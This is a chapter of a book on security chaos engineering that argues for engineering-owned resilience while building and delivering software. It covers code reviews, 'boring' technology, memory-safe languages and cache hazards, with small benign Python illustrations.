Chapter 4. Building and Delivering

We delight in the beauty of the butterfly, but rarely admit the changes it has gone through to achieve that beauty.

Maya Angelou

Building and delivering software systems is complicated and expensive—writing code, compiling it, testing it, deploying it to a repository or staging environment, then delivering it to production for end users to consume. Won’t promoting resilience during those activities just increase that complexity and expense? In a word, no. Building and delivering systems that are resilient to attack does not require special security expertise, and most of what makes for “secure” software overlaps with what makes for “high-quality” software too.

As we’ll discover in this chapter, if we can move quickly, replace easily, and support repeatability, then we can go a long way to match attackers’ nimbleness and reduce the impact of stressors and surprises—whether spawned by attackers or other conspiring influences—in our systems. While this chapter can serve as a guide for security teams to modernize their strategy at this phase, our goal in this chapter is for software or platform engineering teams to understand how they can promote resilience by their own efforts. We need consistency and repeatability. We need to avoid cutting corners while still maintaining speed. We need to follow through on innovation to create more slack in the system. We need to change to stay the same.

We will cover a lot of ground in this chapter—it is packed full of practical wisdom! After we’ve discussed mental models and ownership concerns, we’ll inspect the magical contents of our resilience potion to inform how we can build and deliver resilient software systems. We’ll consider what practices help us crystallize the critical functions of the system and invest in their resilience to attack. We’ll explore how we can stay within the boundaries of safe operation and expand those thresholds for more leeway. We’ll talk about tactics for observing system interactions across space-time—and for making them more linear. We’ll discuss development practices that nurture feedback loops and a learning culture so our mental models don’t calcify. Then, to close, we’ll discover practices and patterns to keep us flexible—willing and able to change to support organizational success as the world evolves.

Mental Models When Developing Software

We talked about good design and architecture from a resilience perspective in the last chapter. There are many ways to accidentally subvert resilient design and architecture once we begin building and delivering those designs. This is the stage where design intentions are first reified: programmers must make choices in how they implement the design, and these choices influence the degree of coupling and interactive complexity in the system. In fact, practitioners at all phases influence this, but we’ll cover each in turn in subsequent chapters. This chapter will explore the numerous trade-offs and opportunities we face as we build and deliver systems.

This phase (building and delivering software) is one of our primary mechanisms for adaptation. This phase is where we can adapt as our organization, business model, or market changes. It’s where we adapt as our organization scales. The way to adapt to such chronic stressors is often by building new software, so we need the ability to accurately translate the intent of our adaptation into the new system. The beauty of chaos experiments is that they expose when our mental models diverge from reality. In this phase, that means we may have an inaccurate idea of what the system does now, but some idea, represented by our design, of how we want it to behave in the future. We want to voyage safely from the current state to the intended future state.

In an SCE world, we must think in terms of systems. This is part of why this phase is described as “building and delivering” and not just “developing” or “coding.” Interconnections matter. The software only matters when it becomes “alive” in the production environment and broader software ecosystem. Just because it can survive on your local machine doesn’t mean it can survive in the wild. It’s when it’s delivered to users—much like how we describe a human birth as a delivery—that the software becomes useful, because now it’s part of a system. So, while we’ll cover ops in the next chapter, we will emphasize the value of this systems perspective for software engineers who typically focus more on the functionality than the environment. Whether your end users are external customers or other internal teams (who are still very much customers), building and delivering a resilient system requires you to think about its ultimate context.

Security chaos experiments help programmers understand the behavior of the systems they build at multiple layers of abstraction. For example, the kube-monkey chaos experimentation tool randomly deletes Kubernetes (“k8s”) pods in a cluster, exposing how failures can cascade between applications in a k8s-orchestrated system (where k8s serves as an abstraction layer). This is crucial because attackers think across abstraction layers and exploit how the system actually behaves rather than how it is intended or documented to behave. This is also useful for debugging and testing specific hypotheses about the system to refine your mental model of it—and therefore learn enough to build the system better with each iteration.
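To see why a random termination can teach us something about cascades, here is a minimal sketch in Python. It does not use kube-monkey or the Kubernetes API; the service names, the DEPENDS_ON map, and the impacted_by helper are all hypothetical, and the sketch assumes every dependency is a hard one with no fallback.

```python
import random

# Hypothetical dependency map: each service lists the services it calls.
DEPENDS_ON = {
    "checkout": ["payments", "inventory"],
    "payments": ["ledger"],
    "inventory": [],
    "ledger": [],
    "reporting": ["ledger"],
}

def impacted_by(failed: str) -> set:
    """Return every service that fails, directly or transitively, when `failed` is down."""
    impacted = {failed}
    changed = True
    while changed:
        changed = False
        for service, deps in DEPENDS_ON.items():
            if service not in impacted and any(dep in impacted for dep in deps):
                impacted.add(service)
                changed = True
    return impacted

rng = random.Random(7)  # seeded so the toy experiment is repeatable
victim = rng.choice(sorted(DEPENDS_ON))
print(f"terminated {victim}; impacted: {sorted(impacted_by(victim))}")
```

If the real system degrades more (or less) than a model like this predicts, that gap is exactly the mental-model drift an experiment is meant to surface.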

Who Owns Application Security (and Resilience)?

SCE endorses software engineering teams taking ownership of building and delivering software based on resilient patterns, like those described in this book. This can take a few forms in organizations. Software engineering teams can completely self-serve—a fully decentralized model—with each team coming up with guidelines based on experience and agreeing on which should become standard (a model that is likely best suited for smaller or newer organizations). An advisory model is another option: software engineering teams could leverage defenders as advisors who can help them get “unstuck” or better navigate resilience challenges. The defenders who do so may be the security team, but they could just as easily be the SRE or platform engineering team, which already conducts similar activities—just perhaps not with the attack perspective at present. Or, as we’ll discuss in great depth in Chapter 7, organizations can craft a resilience program led by a Platform Resilience Engineering team that can define guidelines and patterns as well as create tooling that makes the resilient way the expedient way for internal users.

Warning

If your organization has a typical defender model—like a separate cybersecurity team—there are important considerations to keep in mind when transitioning to an advisory model. Defenders cannot leave the rest of the organization to sink or swim, declaring security awareness training sufficient; we’ll discuss why this is anything but sufficient in Chapter 7. Defenders must determine, document, and communicate resilience and security guidelines, remaining accessible as an advisor to assist with implementation as needed. This is a departure from the traditional model of cybersecurity teams enforcing policies and procedures, requiring a mindshift from autocrat to diplomat.

The problem is that traditional security, including in its modern cosmetic makeover as “DevSecOps,” seeks to micromanage software engineering teams. In practice, cybersecurity teams often thrust themselves into software engineering processes however they can to control more of them and ensure the work is done “right,” where “right” is seen exclusively through the lens of optimizing security. As we know from the world of organizational management, micromanaging is usually a sign of poor managers, unclear goals, and a culture of distrust. The end result is tighter and tighter coupling, an organization as ouroboros.

The goal of good design and platform tools is to make resilience and security background information rather than foreground. In an ideal world, security is invisible: the developer isn’t even aware of security things happening in the background, and their workflows don’t feel more cumbersome. This relates to maintainability: no matter your eagerness or noble intentions, security measures that impede work at this stage aren’t maintainable. As we described in the last chapter, our higher purpose is to resist the gravity of production pressures that suck you into the Danger Zone. Organizations will want you to build more software things more cheaply and more quickly. Our job is to find a sustainable path for this. Unlike traditional infosec, SCE-based security programs seek opportunities to speed up software engineering work while sustaining resilience. Because the fast way will be the way that’s used in practice, making the secure way the fast way is often the best path to a win. We will explore this thoroughly in Chapter 7.

It is impossible for all teams to maintain full context about all parts of your organization’s systems. But resilient development depends on this context, because the best way to build a system to sustain resilience (remember, resilience is a verb) depends on its context. If we want resilient systems, we must nurture local ownership. Attempts at centralizing control, like traditional cybersecurity, will only make our systems brittle because they are ignorant of local context.

Determining context starts out with a lucid mission: “The system works with the availability, speed, and functionality we intend despite the presence of attackers.” That’s really open ended, as it should be. For one company, the most efficient way to realize that mission is building their app to be immutable and ephemeral. For another company, it might be writing the system in Rust[1] (and avoiding using the unsafe keyword as a loophole…[2]). And for yet another company, the best way to realize this mission is to avoid collecting any sensitive data at all, letting third parties handle it instead (and therefore letting them handle its security too).

Lessons We Can Learn from Database Administration Going DevOps

The idea that security could succeed while being “owned” by engineering teams is often perceived as anathema to infosec. But it’s happened in other tricky problem areas, like database administration (DBA).

DBA has shifted toward the “DevOps” model (and, no, it isn’t called DevDBOps). Without adopting DevOps principles, both speed and quality suffer due to:

Mismatched responsibility and authority

Overburdened database operations personnel

Broken feedback loops from production

Reduced developer productivity

Sound familiar? Like DBA, security programs traditionally sit within a specific, central team kept separate from engineering teams and are often at odds with development work. What else can we learn about applying DevOps to DBA?

Developers own database schema, workload, and performance.

Developers debug, troubleshoot, and repair their own outages.

Schema and data model as code.

A single fully automated deployment pipeline exists.

App deployment includes automated schema migrations.

Automated preproduction refreshes from production.

Automation of database operations exists.
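As a rough illustration of “schema and data model as code” and automated schema migrations, here is a minimal sketch using Python’s built-in sqlite3 module. The users table, the MIGRATIONS list, the schema_version table, and the apply_migrations helper are hypothetical names chosen for this example; in practice a team would more likely rely on an established migration tool than on a hand-rolled runner like this.

```python
import sqlite3

# Hypothetical, ordered migrations kept in version control beside the app code.
MIGRATIONS = [
    (1, "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT NOT NULL)"),
    (2, "ALTER TABLE users ADD COLUMN created_at TEXT"),
]

def apply_migrations(conn: sqlite3.Connection) -> list:
    """Apply any migrations not yet recorded; return the versions applied."""
    conn.execute(
        "CREATE TABLE IF NOT EXISTS schema_version (version INTEGER PRIMARY KEY)"
    )
    applied = {row[0] for row in conn.execute("SELECT version FROM schema_version")}
    newly_applied = []
    for version, statement in MIGRATIONS:
        if version in applied:
            continue  # already applied on an earlier deploy
        with conn:  # commits when the block succeeds
            conn.execute(statement)
            conn.execute(
                "INSERT INTO schema_version (version) VALUES (?)", (version,)
            )
        newly_applied.append(version)
    return newly_applied

conn = sqlite3.connect(":memory:")
first_run = apply_migrations(conn)   # applies both migrations
second_run = apply_migrations(conn)  # nothing left to apply
print(first_run, second_run)
```

Because the runner records what it has applied, the deployment pipeline can call it on every release without a human deciding which statements to run.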

These attributes exemplify a decentralized paradigm for database work. There is no single team “owning” database work or expertise. When things go wrong in a specific part of the system, the engineering team responsible for that part of the system is also responsible for sleuthing out what’s going wrong and fixing it. Teams leverage automation for database work, lowering the barrier to entry and lightening the cognitive load for developers—diminishing the desperate need for deep database expertise. It turns out a lot of required expertise is wrapped up in toil work; eliminate manual, tedious tasks and it gets easier on everyone.

It’s worth noting that, in this transformation, toil and complexity haven’t really disappeared (at least, mostly); they’ve just been highly automated and hidden behind abstraction barriers offered by cloud and SaaS providers. And the biggest objection to this transformation—that it would either ruin performance or hinder operations—has been proven (mostly) false. Most organizations simply never run into problems that expose the limitations of this approach.

As data and software engineer Alex Rasmussen notes, this is the same reason why SQL on top of cloud warehouses has largely replaced custom Spark jobs. Some organizations need the power and flexibility Spark grants and are willing to invest the effort in making it successful. But the vast majority of organizations just want to aggregate some structured data and perform a few joins. At this point, we’ve collectively gained sufficient understanding of this “common” mode, so our solutions that target this common mode are quite robust. There will always be outliers, but your organization probably isn’t one.

There are parallels to this dynamic in security too. How many people roll their own payment processing in a world in which payment processing platforms abound? How many people roll their own authentication when there are identity management platform providers? This also reflects the “choose boring” principle we discussed in the last chapter and will discuss later in this chapter in the context of building and delivering. We should assume our problem is boring unless proven otherwise.

If we adapt the attributes of the DBA to DevOps transformation for security, they might look something like:

Developers own security patterns, workload, and performance.

Developers debug, troubleshoot, and repair their own incidents.

Security policies and rules as code.

A single, fully automated deployment pipeline exists.

App deployment includes automated security configuration changes.

Automated preproduction refreshes from production.

Automation of security operations.
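One way to picture “security policies and rules as code” is as a set of small, reviewable checks that a deployment pipeline runs automatically. The sketch below is only illustrative: the deployment descriptor, its field names, and the three rules are assumptions made up for this example, not a real policy engine or any vendor’s format.

```python
# Hypothetical deployment descriptor; the field names are assumptions.
deployment = {
    "name": "reporting-service",
    "run_as_root": True,
    "public_ports": [443, 22],
    "image_tag": "latest",
}

# Each rule pairs a description with a predicate that returns True when it passes.
POLICIES = [
    ("containers must not run as root",
     lambda d: not d.get("run_as_root", False)),
    ("only port 443 may be exposed publicly",
     lambda d: set(d.get("public_ports", [])) <= {443}),
    ("images must be pinned to a version, not 'latest'",
     lambda d: d.get("image_tag") != "latest"),
]

def evaluate(config: dict) -> list:
    """Return the description of every policy the config violates."""
    return [description for description, passes in POLICIES if not passes(config)]

violations = evaluate(deployment)
for violation in violations:
    print(f"{deployment['name']}: {violation}")
```

Rules written this way live in version control, go through the same review as any other change, and can block a deploy without a human gatekeeper reading every pull request.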

You cannot accomplish these attributes through one security team that rules them all. The only way to achieve this alignment of responsibility and accountability is by decentralizing security work. Security Champions programs represent one way to begin decentralizing security programs; organizations that experimented with this model (such as Twilio, whose case study on their program is in the earlier SCE report) are reporting successful results and a more collaborative vibe between security and software engineering. But Security Champions programs are only a bridge. We need a team dedicated to enabling decentralization, which is why we’ll dedicate all of Chapter 7 to Platform Resilience Engineering.

What practices nurture resilience when building and delivering software? We’ll now turn to which practices promote each ingredient of our resilience potion.

Decisions on Critical Functionality Before Building

How do we harvest the first ingredient of our resilience potion recipe—understanding the system’s critical functionality—when building and delivering systems? Well, we should probably start a bit earlier when we decide how to implement our designs from the prior phase. This section covers decisions you should make collectively before you build a part of the system and when you reevaluate it as context changes. When we are implementing critical functionality by developing code, our aim is simplicity and understandability of critical functions; the complexity demon spirit can lurch forth to devour us at any moment!

One facet of critical functionality during this phase is that software engineers are usually building and delivering part of the system, not the whole thing. Neville Holmes, author of the column “The Profession” in IEEE’s Computer magazine, said, “In real life, engineers should be designing and validating the system, not the software. If you forget the system you’re building, the software will often be useless.” Losing sight of critical functionality—at the component, but especially at the system level—will lead us to misallocate effort investment and spoil our portfolio.

How do we best allocate effort investments during this phase to ensure critical functionality is well-defined before it runs in production? We’ll propose a few fruitful opportunities—presented as four practices—during this section that allow us to move quickly while sowing seeds of resilience (and that support our goal of RAVE, which we discussed in Chapter 2).

Tip

If you’re on a security team or leading it, treat the opportunities throughout this chapter as practices you should evangelize in your organization and invest effort in making them easy to adopt. You’ll likely want to partner with whoever sets standards within the engineering organization to do so. And when you choose vendors to support these practices and patterns, include engineering teams in the evaluation process.

Software engineering teams can adopt these on their own. Or, if there’s a platform engineering team, they can expend effort in making these practices as seamless to adopt in engineering workflows as possible. We’ll discuss the platform engineering approach more in Chapter 7.

First, we can define system goals and guidelines using the “airlock approach.” Second, we can conduct thoughtful code reviews to define and verify the critical functions of the system through the power of competing mental models; if someone is doing something weird in their code—which should be flagged during code review one way or another—it will likely be reflected in the resilience properties of their code. Third, we can encourage the use of patterns already established in the system, choosing “boring” technology (an iteration on the theme we explored in the last chapter). And, finally, we can standardize raw materials to free up effort capital that can be invested elsewhere for resilience.

Let’s cover each of these practices in turn.

Defining System Goals and Guidelines on “What to Throw Out the Airlock”

One practice for supporting critical functionality during this phase is what we call the “airlock approach”: whenever we are building and delivering software, we need to define what we can “throw out the airlock.” What functionality and components can you neglect temporarily and still have the system perform its critical functions? What would you like to be able to neglect during an incident? Whatever your answer, make sure you build the software in a way that you can indeed neglect those things as necessary. This applies equally to security incidents and performance incidents; if one component is compromised, the airlock approach allows you to shut it off if it’s noncritical.

For example, if processing transactions is your system’s critical function and reporting is not, you should build the system so you can throw reporting “out the airlock” to preserve resources for the rest of the system. It’s possible that reporting is extremely lucrative—your most prolific money printer—and yet, because timeliness of reporting matters less, it can still be sacrificed. That is, to keep the system safe and keep reporting accurate, you sacrifice the reporting service during an adverse scenario—even as the most valuable service—because its critical functionality can still be upheld with a delay.
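The transactions-versus-reporting example can be sketched in a few lines of Python. This is a toy model under stated assumptions: the Component and System classes, the critical flag, and the throw_out_the_airlock method are hypothetical names invented here, and a real system would shed load through its own mechanisms (feature flags, queues, orchestration controls).

```python
from dataclasses import dataclass, field

@dataclass
class Component:
    name: str
    critical: bool
    enabled: bool = True

@dataclass
class System:
    components: dict = field(default_factory=dict)

    def register(self, name: str, critical: bool) -> None:
        self.components[name] = Component(name, critical)

    def throw_out_the_airlock(self) -> list:
        """Disable every noncritical component; return the names that were shed."""
        shed = []
        for component in self.components.values():
            if not component.critical and component.enabled:
                component.enabled = False
                shed.append(component.name)
        return shed

    def handle(self, name: str, payload: str) -> str:
        component = self.components[name]
        if not component.enabled:
            # Tell the caller the work was skipped so it can be retried later.
            return f"{name}: deferred"
        return f"{name}: processed {payload}"

system = System()
system.register("transactions", critical=True)
system.register("reporting", critical=False)

shed = system.throw_out_the_airlock()
print(shed)
print(system.handle("transactions", "order-42"))
print(system.handle("reporting", "daily-summary"))
```

The design choice worth noticing is that criticality is declared when a component is registered, long before any incident, so the decision about what to sacrifice is not being made for the first time under pressure.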

Another benefit of defining critical functions as finely as we can is that we can constrain batch size, an important dimension in our ability to reason about what we are building and delivering. Ensuring teams can follow the flow of data in a program under their purview helps keep mental models from wandering too far from reality.

This ruthless focus on critical functionality can apply to more local levels too. As we discussed in the last chapter, trending toward single-purpose components infuses more linearity in the system—and it helps us better understand the function of each component. If the critical function of our code remains elusive, then why are we writing it?

Code Reviews and Mental Models

Code reviews help us verify that the implementation of our critical functionality (and noncritical too) aligns with our mental models. Code reviews, at their best, involve one mental model providing feedback on another mental model. When we reify a design through code, we are instantiating our mental model. When we review someone else’s code, we construct a mental model of the code and compare it to our mental model of the intention, providing feedback on anything that deviates (or opportunities to refine it).

In modern software development workflows, code reviews are usually performed after a pull request (“PR”) is submitted. When a developer changes code locally and wants to merge it into the main codebase (known as the “main branch”), they open a PR that notifies another human that those changes—referred to as “commits”—are ready to be reviewed. In a continuous integration and continuous deployment/delivery (CI/CD) model, all the steps involved in pull requests, including merging the changes into the main branch, are automated—except for the code review.

Related to the iterative change model that we’ll discuss later in the chapter, we want our code reviews to be small and quick too. When code is submitted, the developer should get feedback early and quickly. To ensure the reviewer can be quick in their review, changes should be small. If a reviewer is assigned a PR including lots of changes at once, there can be an incentive to cut corners. They might just skim the code, comment “lgtm” (looks good to me), and move on to work they perceive as more valuable (like writing their own code). After all, they won’t get a bonus or get promoted due to thoughtful code reviews; they’re much more likely to receive rewards for writing code that delivers valuable changes into production.

Sometimes critical functions get overlooked during code review because our mental models, as we discussed in the last chapter, are incomplete. As one study found, “the error-handling logic is often simply wrong,” and simple testing of it would prevent many critical production failures in distributed systems.[3] We need code reviews for tests too, where other people validate the tests we write.
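To make “simple testing” of error-handling logic concrete, here is a small sketch in Python. Everything in it is hypothetical: the charge function, the PaymentGatewayError exception, and the two stand-in gateways exist only to show a test that deliberately drives the failure path rather than only the happy path.

```python
class PaymentGatewayError(Exception):
    """Hypothetical error raised when the downstream gateway fails."""

def charge(gateway, amount_cents: int) -> dict:
    """Charge via the gateway; on failure, report the error instead of crashing."""
    try:
        receipt = gateway(amount_cents)
    except PaymentGatewayError as err:
        # The error path is real code and must return a well-formed result too.
        return {"status": "failed", "charged": 0, "reason": str(err)}
    return {"status": "ok", "charged": amount_cents, "receipt": receipt}

def healthy_gateway(amount_cents: int) -> str:
    return f"receipt-{amount_cents}"

def failing_gateway(amount_cents: int) -> str:
    raise PaymentGatewayError("gateway timeout")

def test_charge_success():
    result = charge(healthy_gateway, 500)
    assert result == {"status": "ok", "charged": 500, "receipt": "receipt-500"}

def test_charge_handles_gateway_failure():
    # Inject the fault on purpose: this is the branch reviews tend to skim.
    result = charge(failing_gateway, 500)
    assert result["status"] == "failed"
    assert result["charged"] == 0
    assert "timeout" in result["reason"]

test_charge_success()
test_charge_handles_gateway_failure()
```

A reviewer looking at these tests can ask a sharper question than “does it work?”: which failures are injected, and which are still untested?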

Warning

Formal code reviews are often proposed after a notable incident in the hopes that tighter coupling will improve security (it won’t). If the code in a review is already written and is of significant volume, has many changes, or is very complex, it’s already too late. The code author and the reviewer sitting down together to discuss the changes (versus the async, informal model that is far more common) feels like it might help, but is just “review theater.” If we do have larger features, we should use the “feature branch” model or, even better, ensure we perform a design review that informs how the code will be written.

How do we incentivize thoughtful code reviews? There are a few things we can do to discourage cutting corners, starting with ensuring all the nitpicking will be handled by tools. Engineers should never have to point out issues with formatting or trailing spaces; any stylistic concerns should be checked automatically. Ensuring automated tools handle this kind of nitpicky, grunt work allows engineers to focus on higher-value activities that can foster resilience.
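As a sense of how little effort this kind of automation takes, here is a toy check for trailing whitespace in Python. The find_trailing_whitespace function and the sample source are made up for illustration; in practice a team would wire an established formatter or linter into the pipeline rather than write its own.

```python
def find_trailing_whitespace(source: str) -> list:
    """Return the 1-based numbers of lines that end in spaces or tabs."""
    return [
        number
        for number, line in enumerate(source.splitlines(), start=1)
        if line != line.rstrip(" \t")
    ]

# Line 1 ends in two spaces and line 3 contains only a tab.
sample = "def add(a, b):  \n    return a + b\n\t\n"
offending = find_trailing_whitespace(sample)
print(offending)  # [1, 3]
```

When a machine reports line numbers like these before a human ever opens the pull request, the reviewer’s attention is left free for the questions only a human can answer.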

Warning

There are many code review antipatterns that are unfortunately common in status quo cybersecurity, despite security engineering teams arguably suffering the most from them. One antipattern is a strict requirement for the security team to approve every PR to evaluate its “riskiness.” Aside from the nebulosity of the term riskiness, there is also the issue of the security team lacking relevant context for the code changes.

As any software engineer knows all too well, one engineering team can’t effectively review the PRs of another team. Maybe the storage engineer could spend a week reading the network engineering team’s design docs and then review a PR, but no one does that. A security team certainly can’t do that. The security team might not even understand the critical functions of the system and, in some cases, might not even know enough about the programming language to identify potential problems in a meaningful way.

As a result, the security team can often become a tight bottleneck that slows down the pace of code change, which, in turn, hurts resilience by hindering adaptability. This usually feels miserable for the security team too—and yet leaders often succumb to believing there’s a binary between extremes of manual reviews and “let security issues fall through the cracks.” Only a Sith deals in absolutes.

“Boring” Technology Is Resilient Technology

Another practice that can help us refine our critical functions and prioritize maintaining their resilience to attack is choosing “boring” technology. As expounded upon in engineering executive Dan McKinley’s famous post, “Choose Boring Technology”, boring is not inherently bad. In fact, boring likely indicates well-understood capabilities, which helps us wrangle complexity and reduce the preponderance of “baffling interactions” in our systems (both the system and our mental models become more linear).

In contrast, new, “sexy” technology is less understood and more likely to instigate surprises and bafflements. Bleeding edge is a fitting name given the pain it can inflict when implemented—maybe at first it seems but a flesh wound, but it can eventually drain you and your teams of cognitive energy. In effect, you are adding both tighter coupling and interactive complexity (decreasing linearity). If you recall from the last chapter, choosing “boring” gives us a more extensive understanding, requiring less specialized knowledge—a feature of linear systems—while also promoting looser coupling in a variety of ways.

Thus, when you receive a thoughtful design (such as one informed by the teachings of Chapter 3!), consider whether the coding, building, and delivering choices you make are adding complexity and higher potential for surprises, and whether you are tightly coupling yourself or your organization to those choices. Software engineers should be making software choices (whether languages, frameworks, tooling, and so forth) that best solve specific business problems. The end user really doesn’t care that you used the latest and greatest tool hyped up on Hacker News. The end user wants to use your service whenever they want, as quickly as they want, and with the functionality they want. Sometimes solving those business problems will require a new, fancy technology if it grants you an advantage over your competitors (or otherwise fulfills your organization’s mission). Even so, be cautious about how often you pursue “nonboring” technology to differentiate, for the bleeding edge requires many blood sacrifices to maintain.

Warning

One red flag indicating your security architecture has strayed from the principle of “choose boring” is if your threat models are likely to be radically different from your competitors’. While most threat models will be different—because few systems are exactly alike—it is rare for two services performing the same function by organizations with similar goals to look like strangers. An exception might be if your competitors are stuck in the security dark ages but you are pursuing security-by-design.

During the build and deliver phase, we must be careful about how we prioritize our cognitive efforts—in addition to how we spend resources more generally. You can spend your finite resources on a super slick new tool that uses AI to write unit tests for you. Or you can spend them on building complex functionality that better solves a problem for your target end users. The former doesn’t directly serve your business or differentiate you; it adds significant cognitive overhead that doesn’t serve your collective goals for an uncertain benefit (that would only come after a painful tuning process and hair-pulling from minimal troubleshooting docs).

“OK,” you’re saying, “but what if the new, shiny thing is really really really cool?” You know who else likes really cool, new, shiny software? Attackers. They love when developers adopt new tools and technologies that aren’t yet well understood, because that creates lots of opportunities for attackers to take advantage of mistakes or even intended functionality that hasn’t been sufficiently vetted against abuse. Vulnerability researchers have resumes too, and it looks impressive when they can demonstrate exploitation against the new, shiny thing (usually referred to as “owning” the thing). Once they publish the details of how they exploited the new shiny thing, criminal attackers can figure out how to turn it into a repeatable, scalable attack (completing the Fun-to-Profit Pipeline of offensive infosec).

Security and observability tools aren’t exempt from this “choose boring” principle either. Regardless of your “official” title—and whether you’re a leader, manager, or individual contributor—you should choose and encourage simple, well-understood security and observability tools that are adopted across your systems in a consistent manner. Attackers adore finding “special” implementations of security or observability tools and take pride in defeating new, shiny mitigations that brag about defeating attackers one way or another.

Many security and observability tools require special permissions (like running as root, administrator, or domain administrator) and extensive access to other systems to perform their purported function, making them fantastic tools for attackers to gain deep, powerful access across your critical systems (because those are the ones you especially want to protect and monitor). A new, shiny security tool may say that fancy math will solve all your attack woes, but this fanciness is the opposite of boring and can beget a variety of headaches, including time required to tune on an ongoing basis, network bottlenecks due to data hoovering, kernel panics, or, of course, a vulnerability in it (or its fancy collection and AI-driven, rule-pushing channels) that may offer attackers a lovely foothold onto all the systems that matter to you.

For instance, you might be tempted to “roll your own” authentication or cross-site request forgery (XSRF) protection. Outside of edge cases where authentication or XSRF protection is part of the value your service offers to your customers, it makes far more sense to “choose boring” by adopting established middleware for authentication or XSRF protection. That way, you’re leveraging the vendor’s expertise in this “exotic” area.

Warning

Don’t DIY middleware.

The point is, if you optimize for the “least-worst” tools for as many of your nondifferentiator problems as you can, then it will be easier to maintain and operate the system and therefore to keep it safe. If you optimize for the best tool for each individual problem, or follow the Rule of Cool, then attackers will gladly exploit your resulting cognitive overload and your insufficient allocation of complexity coins to the things that help the system be more resilient to attack. Of course, sticking with something boring that is ineffective doesn’t make sense either and will erode resilience over time too. We want to aim for the sweet spot of boring and effective.

Standardization of Raw Materials

The final practice we’ll cover in the realm of critical functionality is standardizing the “raw materials” we use when building and delivering software—or when we recommend practices to software engineering teams. As we discussed in the last chapter, we can think of “raw materials” in software systems as languages, libraries, and tooling (this applies to firmware and other raw materials that go into computer hardware, like CPUs and GPUs too). These raw materials are elements woven into the software that need to be resilient and safe for system operation.

When building software services, we must be purposeful with what languages, libraries, frameworks, services, and data sources we choose since the service will inherit some of the properties of these raw materials. Many of these materials may have hazardous properties that are unsuitable for building a system as per your requirements. Or the hazard might be expected and, since there isn’t a better alternative for your problem domain, you’ll need to learn to live with it or think of other ways to reduce hazards by design (which we’ll discuss more in Chapter 7). Generally, choosing more than one raw material in any category means you get the downsides of both.

The National Security Agency (NSA) officially recommends using memory safe languages wherever possible, like C#, Go, Java, Ruby, Rust, and Swift. The CTO of Microsoft Azure, Mark Russinovich, tweeted more forcefully: “Speaking of languages, it’s time to halt starting any new projects in C/C++ and use Rust for those scenarios where a non-GC language is required. For the sake of security and reliability, the industry should declare those languages as deprecated.” Memory safety issues damage both the user and the maker of a product or service because data that shouldn’t change can magically become a different value. As Matt Miller, partner security software engineer at Microsoft, presented in 2019, ~70% of the vulnerabilities that Microsoft fixes and assigns a CVE each year are memory safety vulnerabilities due to software engineers mistakenly introducing memory safety bugs in their C and C++ code.

When building or refactoring software, you should pick one of dozens of popular languages that are memory safe by default. Memory unsafety is mighty unpopular in language design, which is great for us since we have a cornucopia of memory safe options from which to pluck. We can even think of C code like lead; it was quite convenient for many use cases, but it’s poisoning us over time, especially as more accumulates.





Ideally, we want to adopt less hazardous raw materials as swiftly as we can, but this quest is often nontrivial (like migrating from one language to another). Full rewrites can work for smaller systems that have relatively complete integration, end-to-end (E2E), and functional tests—but those conditions won’t always be true. The strangler fig pattern, which we’ll discuss at the end of the chapter, is the most obvious approach to help us iteratively change our codebase.

Another option is to pick a language that integrates well with C and make your app a polyglot application, carefully choosing which parts to write in each language. This approach is more granular than the strangler fig pattern and is similar to the Oxidation project, Mozilla’s approach to integrating Rust code in and around Firefox (which is worth exploring for guidance on how to migrate from C to Rust, should you need it). Some systems may even stay in this state indefinitely if there are benefits to having both high- and low-level languages in the same program simultaneously. Games are a common example of this dynamic: engine code needs to be speedy to control memory layout, but gameplay code needs to be quick to iterate on and performance matters much less. But in general, polyglot services and programs are rare, which makes standardization of some materials a bit more straightforward.

Security teams wanting to drive adoption of memory safety should partner with the humans in your organization who are trying to drive engineering standards—whether practices, tools, or frameworks—and participate in that process. All things equal, maintaining consistency is significantly better for resilience. The humans you seek are within the engineering organization, making the connections, and advocating for the adoption of these standards.

On the flipside, these humans have their own goals: to productively build more software and the systems the business desires. If your asks are insensitive, they will ignore you. So, don’t ask for things like disconnecting developer laptops from the internet for security’s sake. Emphasizing the security benefits of refactoring C code into a memory safe language, however, will be more constructive, as it likely fits with their goals too—since productivity and operational hazards notoriously sneak within C. Security can have substantial common ground with that group of humans on C since they also want to get rid of it (except for the occasional human insisting we should all write in Assembly and read the Intel instruction manual).

Warning

As Mozilla stresses, “crossing the C++/Rust boundary can be difficult.” This shouldn’t be underestimated as a downside of this pattern. Because C defines the UNIX platform APIs, most languages have robust foreign function interface (FFI) support for C. C++, however, lacks such substantial support as it has way more language oddities for FFI to deal with and to potentially mess up.

Code that passes a language boundary needs extra attention at all stages of development. An emerging approach is to trap all the C code in a WebAssembly sandbox with generated FFI wrappers provided automatically. This might even be useful for applications that are entirely written in C to be able to trap the unreliable, hazardous parts in a sandbox (like format parsing).

Caches are an example of a hazardous raw material that is often considered necessary. When caching data on behalf of a service, our goal is to reduce the traffic volume to the service. It’s considered successful to have a high cache hit ratio (CHR), and it is often more cost-effective to scale caches than to scale the service behind them. Caches might be the only way to deliver on your performance and cost targets, but some of their properties jeopardize the system’s ability to sustain resilience.

There are two hazards with respect to resilience. The first is mundane: whenever data changes, caches must be invalidated or else the data will appear stale. Invalidation can result in quirky or incorrect overall system behavior (those “baffling” interactions in the Danger Zone) if the system relies on consistent data. If invalidation isn’t coordinated carefully and correctly, stale data can rot in the cache indefinitely.
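
One common way to bound how long stale data can linger (a swapped-in technique, not something this chapter prescribes) is to pair explicit invalidation on writes with a time-to-live (TTL) on every entry, so that a missed invalidation eventually expires on its own. The following is a minimal sketch under that assumption; the `TTLCache` class, its method names, the `origin` dictionary, and the 30-second TTL are all hypothetical.

```python
import time
from typing import Any, Callable, Dict, Hashable, Tuple


class TTLCache:
    """Illustrative read-through cache whose entries expire after a TTL."""

    def __init__(self, ttl_seconds: float,
                 clock: Callable[[], float] = time.monotonic):
        self._ttl = ttl_seconds
        self._clock = clock  # injectable so expiry can be tested without sleeping
        self._entries: Dict[Hashable, Tuple[Any, float]] = {}

    def get(self, key: Hashable, load: Callable[[Hashable], Any]) -> Any:
        """Return the cached value, reloading from the origin if missing or expired."""
        now = self._clock()
        entry = self._entries.get(key)
        if entry is not None and now < entry[1]:
            return entry[0]
        value = load(key)
        self._entries[key] = (value, now + self._ttl)
        return value

    def invalidate(self, key: Hashable) -> None:
        """Call on every write to the origin so readers stop seeing the old value."""
        self._entries.pop(key, None)


# Hypothetical origin: a dict standing in for the backend service.
origin = {"price:42": 10}
cache = TTLCache(ttl_seconds=30.0)

cache.get("price:42", origin.__getitem__)          # miss: loads from the origin
origin["price:42"] = 12                            # the data changes...
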